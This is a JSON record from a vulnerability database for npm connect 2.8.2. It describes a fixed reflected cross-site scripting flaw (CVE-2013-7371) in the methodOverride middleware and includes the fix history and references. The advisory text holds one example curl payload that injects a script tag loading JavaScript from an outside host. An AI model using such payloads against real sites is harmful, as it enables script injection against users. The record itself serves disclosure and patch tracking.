{"url":"http://public2.vulnerablecode.io/api/packages/61982?format=json","purl":"pkg:npm/connect@2.8.2","type":"npm","namespace":"","name":"connect","version":"2.8.2","qualifiers":{},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":"2.14.0","latest_non_vulnerable_version":"2.14.0","affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/30498?format=json","vulnerability_id":"VCID-ff4q-8qw9-dfc1","summary":"methodOverride Middleware Reflected Cross-Site Scripting\nConnect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot [method] [url]\" content. The method was not properly encoded for output in the browser.\n\n\n###Example:\n```\n~ curl \"localhost:3000\" -d \"_method=<script src=http://nodesecurity.io/xss.js></script>\"\nCannot <SCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS></SCRIPT> /\n```\n\n###Credit:\n[Sergio Arcos](https://twitter.com/martes_trece)\n\n###History\n(2013-06-27) Bug reported:\nhttps://github.com/senchalabs/connect/issues/831\n\n(2013-06-27) First fix: escape req.method output\nhttps://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135\n\n(2013-06-27) Second fix: whitelist\nhttps://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a","references":[{"reference_url":"https://exchange.xforce.ibmcloud.com/vulnerabilities/92710","reference_id":"","reference_type":"","scores":[],"url":"https://exchange.xforce.ibmcloud.com/vulnerabilities/92710"},{"reference_url":"https://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a"},{"reference_url":"https://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135"},{"reference_url":"https://github.com/senchalabs/connect/issues/831","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/senchalabs/connect/issues/831"},{"reference_url":"https://nodesecurity.io/advisories/methodOverride_Middleware_Reflected_Cross-Site_Scripting","reference_id":"","reference_type":"","scores":[],"url":"https://nodesecurity.io/advisories/methodOverride_Middleware_Reflected_Cross-Site_Scripting"},{"reference_url":"http://www.openwall.com/lists/oss-security/2014/04/21/2","reference_id":"","reference_type":"","scores":[],"url":"http://www.openwall.com/lists/oss-security/2014/04/21/2"},{"reference_url":"http://www.openwall.com/lists/oss-security/2014/05/13/1","reference_id":"","reference_type":"","scores":[],"url":"http://www.openwall.com/lists/oss-security/2014/05/13/1"},{"reference_url":"https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json","reference_id":"3","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3","scoring_elements":""}],"url":"https://github.com/nodejs/security-wg/blob/main/vuln/npm/3.json"},{"reference_url":"https://access.redhat.com/security/cve/cve-2013-7371","reference_id":"CVE-2013-7371","reference_type":"","scores":[],"url":"https://access.redhat.com/security/cve/cve-2013-7371"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2013-7371","reference_id":"CVE-2013-7371","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2013-7371"},{"reference_url":"https://security-tracker.debian.org/tracker/CVE-2013-7371","reference_id":"CVE-2013-7371","reference_type":"","scores":[],"url":"https://security-tracker.debian.org/tracker/CVE-2013-7371"},{"reference_url":"https://github.com/advisories/GHSA-6w62-83g6-rfhj","reference_id":"GHSA-6w62-83g6-rfhj","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6w62-83g6-rfhj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/6514?format=json","purl":"pkg:npm/connect@2.8.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.1"},{"url":"http://public2.vulnerablecode.io/api/packages/61982?format=json","purl":"pkg:npm/connect@2.8.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.2"}],"aliases":["CVE-2013-7371","GHSA-6w62-83g6-rfhj"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ff4q-8qw9-dfc1"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/connect@2.8.2"}